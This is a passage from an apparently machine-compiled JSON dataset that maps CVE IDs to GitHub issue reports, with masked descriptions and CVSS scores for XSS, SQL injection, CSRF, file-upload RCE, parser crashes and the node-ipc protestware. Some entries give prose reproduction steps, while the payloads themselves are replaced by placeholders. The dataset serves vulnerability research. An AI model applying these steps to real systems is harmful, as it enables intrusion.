  78853. "description": "Assertion 'ecma_is_value_undefined (value) || ecma_is_value_null (value) || ecma_is_value_boolean (value) || ecma_is_value_number (value) || ecma_is_value_string (value) || ecma_is_value_bigint (value) || ecma_is_value_symbol (value) || ecma_is_value_object (value)' failed in ecma helpers APITAG APITAG revision Commit NUMBERTAG da NUMBERTAG URLTAG Version NUMBERTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps ERRORTAG Test case ERRORTAG \u200b Execution steps & Output ERRORTAG",
  78854. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  78855. "severity": "MEDIUM",
  78856. "baseScore": 5.5,
  78857. "impactScore": 3.6,
  78858. "exploitabilityScore": 1.8
  78859. },
  78860. {
  78861. "CVE_ID": "CVE-2022-22893",
  78862. "Issue_Url_old": "https://github.com/jerryscript-project/jerryscript/issues/4901",
  78863. "Issue_Url_new": "https://github.com/jerryscript-project/jerryscript/issues/4901",
  78864. "Repo_new": "jerryscript-project/jerryscript",
  78865. "Issue_Created_At": "2021-12-13T09:33:54Z",
  78866. "description": "Stack overflow in APITAG of vm.c. APITAG revision Commit NUMBERTAG bd6 URLTAG Version NUMBERTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps ERRORTAG Test case ERRORTAG \u200b Execution steps & Output ERRORTAG",
  78867. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  78868. "severity": "HIGH",
  78869. "baseScore": 7.8,
  78870. "impactScore": 5.9,
  78871. "exploitabilityScore": 1.8
  78872. },
  78873. {
  78874. "CVE_ID": "CVE-2022-22895",
  78875. "Issue_Url_old": "https://github.com/jerryscript-project/jerryscript/issues/4882",
  78876. "Issue_Url_new": "https://github.com/jerryscript-project/jerryscript/issues/4882",
  78877. "Repo_new": "jerryscript-project/jerryscript",
  78878. "Issue_Created_At": "2021-12-09T13:20:38Z",
  78879. "description": "Heap buffer overflow in APITAG (ecma helpers conversion.c). APITAG revision Commit NUMBERTAG da NUMBERTAG URLTAG Version NUMBERTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps ERRORTAG Test case ERRORTAG \u200b Another form of testcase Execution steps & Output ERRORTAG",
  78880. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  78881. "severity": "HIGH",
  78882. "baseScore": 7.8,
  78883. "impactScore": 5.9,
  78884. "exploitabilityScore": 1.8
  78885. },
  78886. {
  78887. "CVE_ID": "CVE-2022-22901",
  78888. "Issue_Url_old": "https://github.com/jerryscript-project/jerryscript/issues/4916",
  78889. "Issue_Url_new": "https://github.com/jerryscript-project/jerryscript/issues/4916",
  78890. "Repo_new": "jerryscript-project/jerryscript",
  78891. "Issue_Created_At": "2022-01-02T19:10:38Z",
  78892. "description": "ICE: Assertion 'context_p >next_scanner_info_p >type == SCANNER_TYPE_FUNCTION' failed at PATHTAG APITAG APITAG commit hash APITAG Build platform Ubuntu NUMBERTAG LTS Build steps PATHTAG clean compile flag= fsanitize=address lto=off error message=on profile=es NUMBERTAG subset stack limit NUMBERTAG debug logging=on line info=on poc ERRORTAG assert log ERRORTAG asan log ERRORTAG",
  78893. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  78894. "severity": "MEDIUM",
  78895. "baseScore": 5.5,
  78896. "impactScore": 3.6,
  78897. "exploitabilityScore": 1.8
  78898. },
  78899. {
  78900. "CVE_ID": "CVE-2022-22912",
  78901. "Issue_Url_old": "https://github.com/TooTallNate/plist.js/issues/114",
  78902. "Issue_Url_new": "https://github.com/tootallnate/plist.js/issues/114",
  78903. "Repo_new": "tootallnate/plist.js",
  78904. "Issue_Created_At": "2022-01-06T05:41:28Z",
  78905. "description": "Prototype Pollution using APITAG Hi, There's a prototype pollution in APITAG related to the xml that are being parsed in it. In the following example the prototype pollution will affect the length parameter. ERRORTAG More information about the vulnerability: FILETAG",
  78906. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  78907. "severity": "CRITICAL",
  78908. "baseScore": 9.8,
  78909. "impactScore": 5.9,
  78910. "exploitabilityScore": 3.9
  78911. },
  78912. {
  78913. "CVE_ID": "CVE-2022-22919",
  78914. "Issue_Url_old": "https://github.com/jdordonezn/CVE-2022-22919/issues/1",
  78915. "Issue_Url_new": "https://github.com/jdordonezn/cve-2022-22919/issues/1",
  78916. "Repo_new": "jdordonezn/CVE-2022-22919",
  78917. "Issue_Created_At": "2022-01-26T19:49:12Z",
  78918. "description": "Open redirect in APITAG APITAG NUMBERTAG APITAG APITAG platform version NUMBERTAG or earlier is vulnerable to open redirection for any authenticated user on the platform. An attacker can send an open redirect to the victim, redirecting them to a phishing or other malicious domain, controlled by the attacker. Payload : FILETAG FILETAG APITAG FILETAG",
  78919. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  78920. "severity": "MEDIUM",
  78921. "baseScore": 6.1,
  78922. "impactScore": 2.7,
  78923. "exploitabilityScore": 2.8
  78924. },
  78925. {
  78926. "CVE_ID": "CVE-2022-23047",
  78927. "Issue_Url_old": "https://github.com/exponentcms/exponent-cms/issues/1546",
  78928. "Issue_Url_new": "https://github.com/exponentcms/exponent-cms/issues/1546",
  78929. "Repo_new": "exponentcms/exponent-cms",
  78930. "Issue_Created_At": "2022-01-28T13:28:27Z",
  78931. "description": "Exponent CMS Security Issues. I reported NUMBERTAG ulnerabilities on Exponent NUMBERTAG patch2) using FILETAG but i haven't received any response. Attached below are the links to the tickets, advisories and our responsible disclosure policy respectively. Ticket Stored XSS APITAG URLTAG . Advisory Stored XSS APITAG URLTAG . Ticket File Upload RCE APITAG Extension) URLTAG Advisory File Upload RCE APITAG Extension) URLTAG . Ticket Stored XSS APITAG Agent) URLTAG Advisory Stored XSS APITAG Agent) URLTAG . Security Policy URLTAG .",
  78932. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  78933. "severity": "MEDIUM",
  78934. "baseScore": 4.8,
  78935. "impactScore": 2.7,
  78936. "exploitabilityScore": 1.7
  78937. },
  78938. {
  78939. "CVE_ID": "CVE-2022-23051",
  78940. "Issue_Url_old": "https://github.com/1modm/petereport/issues/36",
  78941. "Issue_Url_new": "https://github.com/1modm/petereport/issues/36",
  78942. "Repo_new": "1modm/petereport",
  78943. "Issue_Created_At": "2022-02-08T18:57:55Z",
  78944. "description": "Security Issue Stored XSS APITAG Tree). Hi I am a security researcher at Fluid Attacks, our security team found a security issue inside APITAG version NUMBERTAG Attached below are the links to our responsible disclosure policy. URLTAG Bug description APITAG Version NUMBERTAG allows an authenticated admin user to inject persistent javascript code while adding an APITAG Tree' by modifying the svg_file parameter. CVSS NUMBERTAG ector: PATHTAG CVSS NUMBERTAG Base Score NUMBERTAG Steps to reproduce NUMBERTAG Create a new Report NUMBERTAG Create a new Finding for the Report NUMBERTAG Go to APITAG > APITAG Reports NUMBERTAG Click on APITAG in the last created record NUMBERTAG Go to APITAG Trees NUMBERTAG Click on APITAG Attack Tree NUMBERTAG Select your Finding and click on APITAG and Finish NUMBERTAG Intercept the request and insert javascript code inside the svg_file parameter. APITAG NUMBERTAG If a user visits the attack tree the javascript code will be rendered. Screenshots and files FILETAG FILETAG System Information Version: APITAG Version NUMBERTAG Operating System: Docker. Web Server: nginx.",
  78945. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  78946. "severity": "MEDIUM",
  78947. "baseScore": 5.4,
  78948. "impactScore": 2.7,
  78949. "exploitabilityScore": 2.3
  78950. },
  78951. {
  78952. "CVE_ID": "CVE-2022-23052",
  78953. "Issue_Url_old": "https://github.com/1modm/petereport/issues/34",
  78954. "Issue_Url_new": "https://github.com/1modm/petereport/issues/34",
  78955. "Repo_new": "1modm/petereport",
  78956. "Issue_Created_At": "2022-02-07T20:20:42Z",
  78957. "description": "Security Issue CSRF APITAG user,product,etc). Hi I am a security researcher at Fluid Attacks, our security team found a security issue inside APITAG version NUMBERTAG Attached below are the links to our responsible disclosure policy. URLTAG Bug description APITAG Version NUMBERTAG contains a Cross Site Request Forgery (CSRF) vulnerability allowing an attacker to trick users into deleting users, products, reports and findings in the application. CVSS NUMBERTAG ector: PATHTAG CVSS NUMBERTAG Base Score NUMBERTAG Steps to reproduce NUMBERTAG Create a malicious html file with the following content. CODETAG NUMBERTAG If an authenticated admin visits the malicious url, the user with the correspond id will be deleted Screenshots and files FILETAG FILETAG System Information Version: APITAG Version NUMBERTAG Operating System: Docker. Web Server: nginx.",
  78958. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
  78959. "severity": "MEDIUM",
  78960. "baseScore": 6.5,
  78961. "impactScore": 3.6,
  78962. "exploitabilityScore": 2.8
  78963. },
  78964. {
  78965. "CVE_ID": "CVE-2022-23094",
  78966. "Issue_Url_old": "https://github.com/libreswan/libreswan/issues/585",
  78967. "Issue_Url_new": "https://github.com/libreswan/libreswan/issues/585",
  78968. "Repo_new": "libreswan/libreswan",
  78969. "Issue_Created_At": "2021-12-21T07:39:17Z",
  78970. "description": "xfrm interface ipsec1 exist after core dump and blocking restart of ipsec service clean. After setting up plutodebug=base, I got the packet which may cause core dump when ike NUMBERTAG is not accept APITAG NUMBERTAG localhost pluto NUMBERTAG received NUMBERTAG bytes from APITAG on eth0 APITAG using UDP Dec NUMBERTAG localhost pluto NUMBERTAG fc b NUMBERTAG e NUMBERTAG Dec NUMBERTAG localhost pluto NUMBERTAG cc NUMBERTAG d NUMBERTAG c ...............\\ Dec NUMBERTAG localhost pluto NUMBERTAG P.... Dec NUMBERTAG localhost pluto NUMBERTAG Dec NUMBERTAG localhost pluto NUMBERTAG b NUMBERTAG c NUMBERTAG Dec NUMBERTAG localhost pluto NUMBERTAG e NUMBERTAG fc b NUMBERTAG e NUMBERTAG Dec NUMBERTAG localhost pluto NUMBERTAG cc ................ Dec NUMBERTAG localhost pluto NUMBERTAG d NUMBERTAG c NUMBERTAG P Dec NUMBERTAG localhost pluto NUMBERTAG Dec NUMBERTAG localhost pluto NUMBERTAG b NUMBERTAG Dec NUMBERTAG localhost pluto NUMBERTAG c NUMBERTAG e NUMBERTAG Dec NUMBERTAG localhost pluto NUMBERTAG Dec NUMBERTAG localhost pluto NUMBERTAG b NUMBERTAG c NUMBERTAG e NUMBERTAG Dec NUMBERTAG localhost pluto NUMBERTAG parse ISAKMP Message: Dec NUMBERTAG localhost pluto NUMBERTAG initiator SPI NUMBERTAG fc b NUMBERTAG e NUMBERTAG Dec NUMBERTAG localhost pluto NUMBERTAG responder SPI NUMBERTAG Dec NUMBERTAG localhost pluto NUMBERTAG next payload type: ISAKMP_NEXT_SA NUMBERTAG Dec NUMBERTAG localhost pluto NUMBERTAG ISAKMP version: ISAKMP Version NUMBERTAG rfc NUMBERTAG Dec NUMBERTAG localhost pluto NUMBERTAG exchange type: ISAKMP_XCHG_IDPROT NUMBERTAG Dec NUMBERTAG localhost pluto NUMBERTAG flags: none NUMBERTAG Dec NUMBERTAG localhost pluto NUMBERTAG Message ID NUMBERTAG Dec NUMBERTAG localhost pluto NUMBERTAG length NUMBERTAG cc) Dec NUMBERTAG localhost pluto NUMBERTAG processing version NUMBERTAG packet with exchange type=ISAKMP_XCHG_IDPROT NUMBERTAG Dec NUMBERTAG localhost pluto NUMBERTAG State DB: IKE NUMBERTAG state not found (find_state_ike NUMBERTAG init) Dec NUMBERTAG localhost pluto NUMBERTAG null state always idle Dec NUMBERTAG localhost pluto NUMBERTAG got payload NUMBERTAG ISAKMP_NEXT_SA) needed NUMBERTAG opt NUMBERTAG Dec NUMBERTAG localhost pluto NUMBERTAG parse ISAKMP Security Association Payload: Dec NUMBERTAG localhost pluto NUMBERTAG next payload type: ISAKMP_NEXT_VID NUMBERTAG d) Dec NUMBERTAG localhost pluto NUMBERTAG length NUMBERTAG c) Dec NUMBERTAG localhost pluto NUMBERTAG DOI: ISAKMP_DOI_IPSEC NUMBERTAG Dec NUMBERTAG localhost pluto NUMBERTAG got payload NUMBERTAG ISAKMP_NEXT_VID) needed NUMBERTAG opt NUMBERTAG Dec NUMBERTAG localhost systemd NUMBERTAG APITAG Main process exited, code=dumped, status NUMBERTAG SEGV Dec NUMBERTAG localhost systemd NUMBERTAG APITAG Failed with result 'core dump'. Dec NUMBERTAG localhost systemd NUMBERTAG APITAG Consumed NUMBERTAG s CPU time. Dec NUMBERTAG localhost systemd NUMBERTAG APITAG Scheduled restart job, restart counter is at NUMBERTAG Dec NUMBERTAG localhost systemd NUMBERTAG Stopped Internet Key Exchange (IKE) Protocol Daemon for APITAG Dec NUMBERTAG localhost systemd NUMBERTAG APITAG Consumed NUMBERTAG s CPU time. Dec NUMBERTAG localhost systemd NUMBERTAG Starting Internet Key Exchange (IKE) Protocol Daemon for APITAG normally after core dump the APITAG service restart by unfortunately the original xfrm interface was not clear and cause below: APITAG NUMBERTAG localhost pluto NUMBERTAG ike NUMBERTAG cp\": conflict ipsec1 already exist cannot support xfrm interface. May be leftover from previous pluto? Dec NUMBERTAG localhost pluto NUMBERTAG ike NUMBERTAG cp\": failed to add connection: ipsec interface NUMBERTAG not supported. device name conflict in APITAG This cause the VPN server not accept any connection request and need manual restart the service. Any workaround?",
  78971. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  78972. "severity": "HIGH",
  78973. "baseScore": 7.5,
  78974. "impactScore": 3.6,
  78975. "exploitabilityScore": 3.9
  78976. },
  78977. {
  78978. "CVE_ID": "CVE-2022-23316",
  78979. "Issue_Url_old": "https://github.com/taogogo/taocms/issues/15",
  78980. "Issue_Url_new": "https://github.com/taogogo/taocms/issues/15",
  78981. "Repo_new": "taogogo/taocms",
  78982. "Issue_Created_At": "2022-01-10T07:43:07Z",
  78983. "description": "arbitrary file read vulnerability. analysis The location of the vulnerability is line NUMBERTAG in PATHTAG and we can see that the path parameter is passed directly to file_get_contents function without filtering FILETAG FILETAG poc After login as APITAG the file management interface and edit function FILETAG Get packets using brup Any file can be read after changing the path parameter FILETAG",
  78984. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N",
  78985. "severity": "MEDIUM",
  78986. "baseScore": 4.9,
  78987. "impactScore": 3.6,
  78988. "exploitabilityScore": 1.2
  78989. },
  78990. {
  78991. "CVE_ID": "CVE-2022-23318",
  78992. "Issue_Url_old": "https://github.com/ganaware/pcf2bdf/issues/4",
  78993. "Issue_Url_new": "https://github.com/ganaware/pcf2bdf/issues/4",
  78994. "Repo_new": "ganaware/pcf2bdf",
  78995. "Issue_Created_At": "2022-01-11T12:41:03Z",
  78996. "description": "Heap buffer overflow in pcf2bdf. Hello MENTIONTAG as discussed earlier: I have compiled pcf2bdf with address sanitization and fuzz tested inputs with AFL . The file attached causes a memory access violation. The actual input file is stored within the zipped folder attached. Input: APITAG Output: ERRORTAG FILETAG",
  78997. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H",
  78998. "severity": "HIGH",
  78999. "baseScore": 7.1,
  79000. "impactScore": 5.2,
  79001. "exploitabilityScore": 1.8
  79002. },
  79003. {
  79004. "CVE_ID": "CVE-2022-23319",
  79005. "Issue_Url_old": "https://github.com/ganaware/pcf2bdf/issues/5",
  79006. "Issue_Url_new": "https://github.com/ganaware/pcf2bdf/issues/5",
  79007. "Repo_new": "ganaware/pcf2bdf",
  79008. "Issue_Created_At": "2022-01-11T12:45:15Z",
  79009. "description": "Segmentation fault ASAN Deadly Signal in pcf2bdf. Hello MENTIONTAG as discussed earlier: I have compiled pcf2bdf with address sanitization and fuzz tested inputs with AFL. The file is partially parsed before the program crashes due to a segmentation fault. The actual input file is stored within the zipped folder attached. Input: APITAG Output: ERRORTAG FILETAG",
  79010. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  79011. "severity": "MEDIUM",
  79012. "baseScore": 5.5,
  79013. "impactScore": 3.6,
  79014. "exploitabilityScore": 1.8
  79015. },
  79016. {
  79017. "CVE_ID": "CVE-2022-23331",
  79018. "Issue_Url_old": "https://github.com/dataease/dataease/issues/1618",
  79019. "Issue_Url_new": "https://github.com/dataease/dataease/issues/1618",
  79020. "Repo_new": "dataease/dataease",
  79021. "Issue_Created_At": "2022-01-11T05:27:34Z",
  79022. "description": "Security APITAG APITAG NUMBERTAG Chrome NUMBERTAG Bug \u63cf\u8ff0 An authenticated user can access information about all users and change admin password Bug NUMBERTAG use demo login NUMBERTAG access api NUMBERTAG",
  79023. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  79024. "severity": "HIGH",
  79025. "baseScore": 8.8,
  79026. "impactScore": 5.9,
  79027. "exploitabilityScore": 2.8
  79028. },
  79029. {
  79030. "CVE_ID": "CVE-2022-23340",
  79031. "Issue_Url_old": "https://github.com/laurent22/joplin/issues/6004",
  79032. "Issue_Url_new": "https://github.com/laurent22/joplin/issues/6004",
  79033. "Repo_new": "laurent22/joplin",
  79034. "Issue_Created_At": "2022-01-11T12:59:44Z",
  79035. "description": "Remote Code Execution vulnerability. APITAG APITAG Environment Joplin version: Joplin NUMBERTAG prod, win NUMBERTAG Platform: Windows OS specifics: Windows NUMBERTAG APITAG Steps to reproduce This is a serious security vulnerability. I do not wish to make the details public until the author is contacted. APITAG Describe what you expected to happen I want to contact the author individually using email or telegram Logfile APITAG",
  79036. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  79037. "severity": "CRITICAL",
  79038. "baseScore": 9.8,
  79039. "impactScore": 5.9,
  79040. "exploitabilityScore": 3.9
  79041. },
  79042. {
  79043. "CVE_ID": "CVE-2022-23363",
  79044. "Issue_Url_old": "https://github.com/g33kyrash/Online-Banking-system/issues/15",
  79045. "Issue_Url_new": "https://github.com/g33kyrash/online-banking-system/issues/15",
  79046. "Repo_new": "g33kyrash/online-banking-system",
  79047. "Issue_Created_At": "2022-01-14T01:51:17Z",
  79048. "description": "There is a SQL injection vulnerability in FILETAG . First visit FILETAG FILETAG Enter any user and APITAG burp to capture packets FILETAG Modify the data package as follows, save as APITAG ERRORTAG execute APITAG APITAG FILETAG",
  79049. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  79050. "severity": "CRITICAL",
  79051. "baseScore": 9.8,
  79052. "impactScore": 5.9,
  79053. "exploitabilityScore": 3.9
  79054. },
  79055. {
  79056. "CVE_ID": "CVE-2022-23375",
  79057. "Issue_Url_old": "https://github.com/Zavy86/WikiDocs/issues/28",
  79058. "Issue_Url_new": "https://github.com/zavy86/wikidocs/issues/28",
  79059. "Repo_new": "zavy86/wikidocs",
  79060. "Issue_Created_At": "2022-02-19T13:50:49Z",
  79061. "description": "Multiple Vulnerabilities in APITAG NUMBERTAG APITAG Reflected XSS Injection First vulnerability in line NUMBERTAG FILETAG Second is in line NUMBERTAG FILETAG XSS directly using url: URLTAG NUMBERTAG APITAG Reflected XSS Injection Vulnerability in line NUMBERTAG FILETAG XSS directly using url: URLTAG }) PATHTAG NUMBERTAG SS NUMBERTAG E NUMBERTAG APITAG Debug mode can be enabled: Vulnerable lines are between NUMBERTAG FILETAG You can get sensitive information using debug mode: FILETAG NUMBERTAG APITAG Reflected Xss Injection: FILETAG NUMBERTAG APITAG Image upload, Authenticated Remote Code Execution: first, log in to the website and click edit button on the right top: FILETAG Before upload proccess, we have to create malicious payload image: FILETAG name: FILETAG payload : APITAG After that, you have to click image button on top and upload image: FILETAG Select malicious file and click upload: FILETAG In upload process, change file extension to the PHP in the POST request: FILETAG then the browser automatically sends another request to the malicious file: FILETAG Just browse it and try to execute some commands: FILETAG I hope you wil close these vulnerabilities ASAP.",
  79062. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  79063. "severity": "HIGH",
  79064. "baseScore": 8.8,
  79065. "impactScore": 5.9,
  79066. "exploitabilityScore": 2.8
  79067. },
  79068. {
  79069. "CVE_ID": "CVE-2022-23379",
  79070. "Issue_Url_old": "https://github.com/emlog/emlog/issues/144",
  79071. "Issue_Url_new": "https://github.com/emlog/emlog/issues/144",
  79072. "Repo_new": "emlog/emlog",
  79073. "Issue_Created_At": "2022-01-14T14:04:01Z",
  79074. "description": "emlog NUMBERTAG has SQL injection vulnerability. SQL injection exists in background batch deletion label\uff0cthe passed in key was not verified FILETAG Eventually, the APITAG parameter of APITAG can be passed in malicious code Function generating vulnerability ERRORTAG Verification FILETAG FILETAG FILETAG FILETAG",
  79075. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  79076. "severity": "CRITICAL",
  79077. "baseScore": 9.8,
  79078. "impactScore": 5.9,
  79079. "exploitabilityScore": 3.9
  79080. },
  79081. {
  79082. "CVE_ID": "CVE-2022-23380",
  79083. "Issue_Url_old": "https://github.com/taogogo/taocms/issues/16",
  79084. "Issue_Url_new": "https://github.com/taogogo/taocms/issues/16",
  79085. "Repo_new": "taogogo/taocms",
  79086. "Issue_Created_At": "2022-01-15T18:16:58Z",
  79087. "description": "There is SQL blind injection at APITAG Edit\". FILETAG FILETAG CODETAG FILETAG FILETAG FILETAG PATHTAG FILETAG PATHTAG FILETAG PATHTAG FILETAG",
  79088. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  79089. "severity": "HIGH",
  79090. "baseScore": 8.8,
  79091. "impactScore": 5.9,
  79092. "exploitabilityScore": 2.8
  79093. },
  79094. {
  79095. "CVE_ID": "CVE-2022-23384",
  79096. "Issue_Url_old": "https://github.com/yzmcms/yzmcms/issues/58",
  79097. "Issue_Url_new": "https://github.com/yzmcms/yzmcms/issues/58",
  79098. "Repo_new": "yzmcms/yzmcms",
  79099. "Issue_Created_At": "2022-01-16T14:50:07Z",
  79100. "description": "There is one CSRF vulnerability that can add the administrator account . After the administrator logged in, open the following one page admin,add. URLTAG / APITAG APITAG APITAG APITAG '', '/') APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG",
  79101. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  79102. "severity": "HIGH",
  79103. "baseScore": 8.8,
  79104. "impactScore": 5.9,
  79105. "exploitabilityScore": 2.8
  79106. },
  79107. {
  79108. "CVE_ID": "CVE-2022-23387",
  79109. "Issue_Url_old": "https://github.com/taogogo/taocms/issues/23",
  79110. "Issue_Url_new": "https://github.com/taogogo/taocms/issues/23",
  79111. "Repo_new": "taogogo/taocms",
  79112. "Issue_Created_At": "2022-01-17T02:51:41Z",
  79113. "description": "There is SQL blind injection at APITAG Update\". CODETAG FILETAG FILETAG FILETAG FILETAG FILETAG PATHTAG FILETAG PATHTAG FILETAG PATHTAG FILETAG PATHTAG FILETAG",
  79114. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  79115. "severity": "HIGH",
  79116. "baseScore": 7.5,
  79117. "impactScore": 3.6,
  79118. "exploitabilityScore": 3.9
  79119. },
  79120. {
  79121. "CVE_ID": "CVE-2022-23389",
  79122. "Issue_Url_old": "https://github.com/sanluan/PublicCMS/issues/59",
  79123. "Issue_Url_new": "https://github.com/sanluan/publiccms/issues/59",
  79124. "Repo_new": "sanluan/publiccms",
  79125. "Issue_Created_At": "2021-11-25T10:38:25Z",
  79126. "description": "Arbitrary command execution vulnerability\uff08\u4efb\u610f\u547d\u4ee4\u6267\u884c\u6f0f\u6d1e\uff09. APITAG NUMBERTAG alue parameter has command execution vulnerability",
  79127. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  79128. "severity": "CRITICAL",
  79129. "baseScore": 9.8,
  79130. "impactScore": 5.9,
  79131. "exploitabilityScore": 3.9
  79132. },
  79133. {
  79134. "CVE_ID": "CVE-2022-23391",
  79135. "Issue_Url_old": "https://github.com/tomoya92/pybbs/issues/171",
  79136. "Issue_Url_new": "https://github.com/atjiu/pybbs/issues/171",
  79137. "Repo_new": "atjiu/pybbs",
  79138. "Issue_Created_At": "2022-01-18T03:18:26Z",
  79139. "description": "This forum has a large number of xss vulnerabilities. The first is located at the home page search Enter in the search box APITAG FILETAG The second vulnerability is located in the backend In the topic editor in the background, enter ERRORTAG FILETAG FILETAG The third vulnerability is located at the topic search Enter in the search box APITAG FILETAG and many more ...",
  79140. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  79141. "severity": "MEDIUM",
  79142. "baseScore": 6.1,
  79143. "impactScore": 2.7,
  79144. "exploitabilityScore": 2.8
  79145. },
  79146. {
  79147. "CVE_ID": "CVE-2022-23596",
  79148. "Issue_Url_old": "https://github.com/junrar/junrar/issues/73",
  79149. "Issue_Url_new": "https://github.com/junrar/junrar/issues/73",
  79150. "Repo_new": "junrar/junrar",
  79151. "Issue_Created_At": "2022-01-27T03:29:04Z",
  79152. "description": "FILETAG Environment (please complete the following information): OS: Mac OS NUMBERTAG Junrar version NUMBERTAG Additional context It seems this APITAG can reach [this while loop] ( URLTAG but never break.",
  79153. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  79154. "severity": "HIGH",
  79155. "baseScore": 7.5,
  79156. "impactScore": 3.6,
  79157. "exploitabilityScore": 3.9
  79158. },
  79159. {
  79160. "CVE_ID": "CVE-2022-23638",
  79161. "Issue_Url_old": "https://github.com/darylldoyle/svg-sanitizer/issues/71",
  79162. "Issue_Url_new": "https://github.com/darylldoyle/svg-sanitizer/issues/71",
  79163. "Repo_new": "darylldoyle/svg-sanitizer",
  79164. "Issue_Created_At": "2022-02-14T16:03:26Z",
  79165. "description": "Requesting more details on GHSA fq NUMBERTAG p NUMBERTAG qcc. It seems tag APITAG addressed a security vulnerability, see corresponding advisory URLTAG Corresponding commit at URLTAG contains a new test case FILETAG . Invoked as APITAG in browser, mime type APITAG ERRORTAG \u2192 no problem since APITAG is not a SVG element Invoked as APITAG in browser, mime type APITAG ERRORTAG \u2192 valid concern, since HTML is used in inline SVG \u2192 scripts are executed in browser \u2192 cross site scripting Conclusion & Alternative approach removing non SVG elements (e.g. APITAG ) seems to be fine, see URLTAG removing APITAG and APITAG nodes seems to be superfluous and leads to regressions like in NUMBERTAG",
  79166. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  79167. "severity": "MEDIUM",
  79168. "baseScore": 6.1,
  79169. "impactScore": 2.7,
  79170. "exploitabilityScore": 2.8
  79171. },
  79172. {
  79173. "CVE_ID": "CVE-2022-23652",
  79174. "Issue_Url_old": "https://github.com/clastix/capsule-proxy/issues/188",
  79175. "Issue_Url_new": "https://github.com/clastix/capsule-proxy/issues/188",
  79176. "Repo_new": "clastix/capsule-proxy",
  79177. "Issue_Created_At": "2022-02-18T19:53:04Z",
  79178. "description": "Privilege escalation vulnerability via malicious APITAG header. A user crafting an API request directed at APITAG can get a privilege escalation using the Service Account of the proxy itself. This is done by passing the APITAG or APITAG header in the Connection header, using the same exploit described here: URLTAG > At this point, instead of impersonating the user and their permissions, the request will act as if it was from the APITAG management server~~ Capsule Proxy and incorrectly return the information.",
  79179. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  79180. "severity": "HIGH",
  79181. "baseScore": 8.8,
  79182. "impactScore": 5.9,
  79183. "exploitabilityScore": 2.8
  79184. },
  79185. {
  79186. "CVE_ID": "CVE-2022-23812",
  79187. "Issue_Url_old": "https://github.com/RIAEvangelist/node-ipc/issues/233",
  79188. "Issue_Url_new": "https://github.com/riaevangelist/node-ipc/issues/233",
  79189. "Repo_new": "RIAEvangelist/node-ipc",
  79190. "Issue_Created_At": "2022-03-09T15:24:42Z",
  79191. "description": "Remove the 'peacenotwar' module as it is literally malware. Remove the 'peacenotwar' module as it is literally malware > This code serves as a non destructive example of why controlling your node modules is important. The module literally then proceeds to write files to the host's device: URLTAG Don't get me wrong, I'm against all forms of war, but sabotaging people's dependencies is not the way to protest. Slava Ukraini",
  79192. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  79193. "severity": "CRITICAL",
  79194. "baseScore": 9.8,
  79195. "impactScore": 5.9,
  79196. "exploitabilityScore": 3.9
  79197. },
  79198. {
  79199. "CVE_ID": "CVE-2022-23812",
  79200. "Issue_Url_old": "https://github.com/RIAEvangelist/node-ipc/issues/236",
  79201. "Issue_Url_new": "https://github.com/riaevangelist/node-ipc/issues/236",
  79202. "Repo_new": "RIAEvangelist/node-ipc",
  79203. "Issue_Created_At": "2022-03-15T14:17:30Z",
  79204. "description": "A package should never try to do unrelated things.. Give people a hamburger when they want one, do not try giving them a humberger with some shits.",
  79205. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  79206. "severity": "CRITICAL",
  79207. "baseScore": 9.8,
  79208. "impactScore": 5.9,
  79209. "exploitabilityScore": 3.9
  79210. },
  79211. {
  79212. "CVE_ID": "CVE-2022-2385",
